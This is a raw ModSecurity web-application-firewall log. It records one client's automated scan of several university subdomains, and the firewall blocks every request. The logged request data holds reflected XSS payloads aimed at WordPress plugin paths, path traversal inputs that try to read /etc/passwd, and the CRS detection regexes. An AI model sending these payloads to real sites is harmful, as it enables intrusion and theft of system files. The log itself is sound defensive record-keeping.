[Tue Aug 29 11:56:17.180385 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16ccCo-f0AAApHRmoAAAAP"]
[Tue Aug 29 11:56:17.189472 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16ccCo-f0AAAqeFmQAAAAx"]
[Tue Aug 29 11:56:17.219589 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16ccCo-f0AAApHRmsAAAAP"]
[Tue Aug 29 11:56:17.566670 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAArB1zwAAAAV"]
[Tue Aug 29 11:56:17.582998 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAArC7jgAAAAW"]
[Tue Aug 29 11:56:17.639581 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAArC7joAAAAW"]
[Tue Aug 29 11:56:17.712592 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAArC7j0AAAAW"]
[Tue Aug 29 11:56:17.775059 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAAq@sjYAAAAM"]
[Tue Aug 29 11:56:17.777657 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16ccCo-f0AAArC7kAAAAAW"]
[Tue Aug 29 11:56:18.567142 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAAq5@PkAAAAK"]
[Tue Aug 29 11:56:18.567220 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAApHRm0AAAAP"]
[Tue Aug 29 11:56:18.859795 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAAq@sjoAAAAM"]
[Tue Aug 29 11:56:18.938824 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16csCo-f0AAApXguYAAAAU"]
[Tue Aug 29 11:56:18.975582 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAApHRnAAAAAP"]
[Tue Aug 29 11:56:19.061357 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16c8Co-f0AAApHRnIAAAAP"]
[Tue Aug 29 11:56:19.073902 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16c8Co-f0AAAolK1sAAAAe"]
[Tue Aug 29 11:56:19.541472 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAq5@P4AAAAK"]
[Tue Aug 29 11:56:19.543019 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAolK1wAAAAe"]
[Tue Aug 29 11:56:19.651023 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAolK14AAAAe"]
[Tue Aug 29 11:56:19.667815 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAq@sj8AAAAM"]
[Tue Aug 29 11:56:20.104784 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dMCo-f0AAApHRnoAAAAP"]
[Tue Aug 29 11:56:21.004678 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16dMCo-f0AAAqsV8IAAAAB"]
[Tue Aug 29 11:56:21.303923 2023] [:error] [pid 2587] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16dcCo-f0AAAobUA4AAAAQ"]
[Tue Aug 29 11:56:21.540436 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArIARYAAAAX"]
[Tue Aug 29 11:56:21.708212 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArIARgAAAAX"]
[Tue Aug 29 11:56:21.730850 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArIARkAAAAX"]
[Tue Aug 29 11:56:21.731899 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArJXkAAAAAZ"]
[Tue Aug 29 11:56:21.812067 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArJXkQAAAAZ"]
[Tue Aug 29 11:56:21.830293 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArIAR0AAAAX"]
[Tue Aug 29 11:56:21.901393 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArIASAAAAAX"]
